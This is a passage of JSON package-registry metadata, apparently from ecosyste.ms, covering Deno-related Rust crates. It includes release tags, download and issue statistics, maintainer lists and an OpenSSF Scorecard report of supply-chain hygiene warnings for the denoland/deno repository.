,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T15:40:53.673Z","dependent_packages_count":6,"downloads":922435,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":7.682354357246028,"dependent_repos_count":13.256646755239915,"dependent_packages_count":5.361750788050224,"stargazers_count":null,"forks_count":null,"docker_downloads_count":6.755160244109834,"average":8.2639780361615},"purl":"pkg:cargo/deno_lockfile","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_lockfile","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_lockfile","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_lockfile/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lockfile/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-01-23T15:18:36.585Z","updated_at":"2023-01-23T15:18:36.585Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-08-02T14:32:48.871Z","updated_at":"2023-08-02T14:32:48.871Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047014,"name":"deno_broadcast_channel","ecosystem":"cargo","description":"DEPRECATED: use `deno_web` instead","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":216,"first_release_published_at":"2021-05-23T13:44:47.535Z","latest_release_published_at":"2025-11-06T07:37:10.916Z","latest_release_number":"0.216.0","last_synced_at":"2026-08-29T21:57:58.275Z","created_at":"2022-04-12T09:57:59.272Z","updated_at":"2026-08-29T21:57:58.276Z","registry_url":"https://crates.io/crates/deno_broadcast_channel/","install_command":"cargo install deno_broadcast_channel","documentation_url":"https://docs.rs/deno_broadcast_channel/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies 